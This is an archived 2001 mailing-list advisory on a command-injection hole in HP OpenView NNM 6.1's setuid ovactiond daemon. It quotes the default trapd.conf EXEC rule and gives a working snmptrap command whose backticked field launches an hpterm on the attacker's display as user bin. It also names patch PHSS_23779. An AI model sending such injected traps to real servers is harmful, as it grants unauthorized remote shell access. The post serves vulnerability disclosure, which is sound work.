Hello, Summery: HP Openview NNM6.1 and earlier running on unix have a problem with the suid bin executable ovactiond. It allows for starting of any program by just sending a trap or event to the station running the daemon. Details: in the trapd.conf the following is defined by default (NNM6.1): # EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000 0208 "Configuration Alarms" Warning FORMAT Generic NNM to MgX message. $12 EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10 1.3.[snip...] # by sending this trap: snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" You get an hpterm on your client display running under user bin on the NNM server. The reason is that NNM first completes the command under the EXEC and then starts that in a shell. Path: the patch to install is PHSS_23779 and is default in all newest patch releases of NNM. This patch checks for 'strange' characters in the input strings received through the event or trap. MAG, Milo PS: moderator, please inform me why you do/did not place this message...
This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 08:11:43 PDT